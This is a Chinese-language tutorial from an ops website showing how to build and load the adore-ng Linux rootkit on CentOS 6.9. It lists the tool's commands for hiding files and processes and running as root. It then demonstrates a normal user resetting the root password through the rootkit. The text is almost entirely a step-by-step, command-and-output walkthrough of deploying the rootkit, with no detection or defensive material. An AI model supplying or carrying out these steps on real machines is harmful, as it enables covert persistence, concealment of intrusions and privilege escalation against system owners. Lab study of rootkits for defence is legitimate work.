首页
运维教程
Linux基础
系统服务
系统架构
数据库
shell脚本
虚拟化
大数据
DevOps
企业案例
运维开发
python
go语言
运维安全
行业资讯
网络基础
系统安全
运维面试
学习路线
学习方法
面试题库
职场解惑
软件
运维软件
办公软件
书籍资源
技术陪跑营
重要信息
首页 运维教程系统服务Linux下木马程序隐藏进程实战

Linux下木马程序隐藏进程实战

实验环境

本实验在6.x的操作系统上完成:

[root@gaosh-1 ~]# cat /etc/redhat-release 
CentOS release 6.9 (Final)

Rootkit概述

Rootkit概述:Rootkit 是指在已获得系统最高权限的情况下,一种用来保持对目标系统最高访问权限并隐藏攻击行为的工具集.
Rootkit 是一个典型的木马软件,广泛存在于多种操作系统之中。Rootkit 工具一般由多个程序组成,包含各种辅助攻击的工具。例如,网络嗅探工具,用来截获在网络上传输的信息;恶意木马程序,维护再次进入系统的后门;隐藏各种攻击行为的程序;过滤日志的程序,用来删除与攻击行为相关的日志记录等。

Rootkit 你可以理解为是谍战类电影中潜伏在我方的间谍,他们的工作就是不暴露自己、收集情报、制造混乱。

今天我们介绍的是其中的一种,叫adore-ng

在github上有分享:https://github.com/trimpsyw/adore-ng

在这里插入图片描述

环境准备

1. 上传软件包

在这里插入图片描述
在这里插入图片描述

2. 解压软件包
root@gaosh-1 adore]# unzip adore-ng-master.zip
[root@gaosh-1 adore]# ls
adore-ng-master  adore-ng-master.zip
[root@gaosh-1 adore]# cd adore-ng-master
[root@gaosh-1 adore-ng-master]# 

3. 安装依赖包
[root@gaosh-1 adore-ng-master]# mount /dev/cdrom /mnt
mount: block device /dev/sr0 is write-protected, mounting read-only
[root@gaosh-1 adore-ng-master]# 

安装内核模块:

[root@gaosh-1 adore-ng-master]# rpm -ivh /mnt/Packages/kernel-devel-2.6.32-696.el6.x86_64.rpm 

安装adore-ng

[root@gaosh-1 adore-ng-master]# ls
adore-ng.c  ava.c           libinvisible.h  Makefile
adore-ng.h  libinvisible.c  LICENSE         README.md
[root@gaosh-1 adore-ng-master]# 
[root@gaosh-1 adore-ng-master]# make -j 4

注意这里无需执行make install

我们只需要加载相应的模块即可

[root@gaosh-1 adore-ng-master]# insmod adore-ng.ko

测试命令是否运行

[root@gaosh-1 adore-ng-master]# ./ava 
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]

       I print info (secret UID etc)
       h hide file  ## 隐藏文件
       u unhide file   ## 取消隐藏
       r execute as root  ## 提权像root一样运行
       R remove PID forever  ## 删除PID
       U uninstall adore
       i make PID invisible   ### 隐藏进程
       v make PID visible

rootkit木马的使用

提权演示

实验步骤:
1. 创建普通用户便于测试,因为我们要用普通用户提权
2. 将adore-ng移动到可以让普通用户访问的目录,在root下普通用户没有权限
3. 使用r命令进行提权
4. 提权效果演示

1. 创建普通用户便于测试,因为我们要用普通用户提权

创建测试用户:

   [root@gaosh-1 adore]# useradd zmgaosh;echo 123456 |passwd --stdin zmgaosh
useradd:用户“zmgaosh”已存在
更改用户 zmgaosh 的密码 。
passwd: 所有的身份验证令牌已经成功更新。
[root@gaosh-1 adore]# 
2. 将adore-ng移动到可以让普通用户访问的目录,在root下普通用户没有权限
[root@gaosh-1 adore]# cp -r adore-ng-master /tmp/
[root@gaosh-1 adore]# chmod 777 /tmp/adore-ng-master/ -R 让普通用户有权限访问
3. 使用r命令进行提权
[root@gaosh-1 adore]# su - zmgaosh   ## 切换到普通用户
[zmgaosh@gaosh-1 ~]cd /tmp/adore-ng-master/
[zmgaosh@gaosh-1 adore-ng-master] 
4. 提权效果演示
[zmgaosh@gaosh-1 adore-ng-master]passwd root     ### 修改root密码
passwd: 只有根用户才能指定用户名称。

[zmgaosh@gaosh-1 adore-ng-master] ./ava r passwd root   ## 提权修改root密码
56,500,500,56
Adore 1.56 installed. Good luck.
更改用户 root 的密码 。
新的 密码:
无效的密码: 过于简单化/系统化
无效的密码: 过于简单
重新输入新的 密码:
passwd: 所有的身份验证令牌已经成功更新。
[zmgaosh@gaosh-1 adore-ng-master]$ 

总结:
rootkit还可以隐藏进程,隐藏文件,这些功能大家可以自己研究下,这个工具有点老了,虽然还有人在用,但是现在有了更新,更好用的工具, 但原理都差不多,在学习的过程中擅于举一反三,是很好的学习方法。

工具是永远学不完的,因为时间在前进,新工具层出不穷。

本文链接:http://www.geekyunwei.com/271.html

网友评论comments

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

暂无评论

Copyright © 2021 极客运维 公众号《极客运维之家》
扫二维码
扫二维码
返回顶部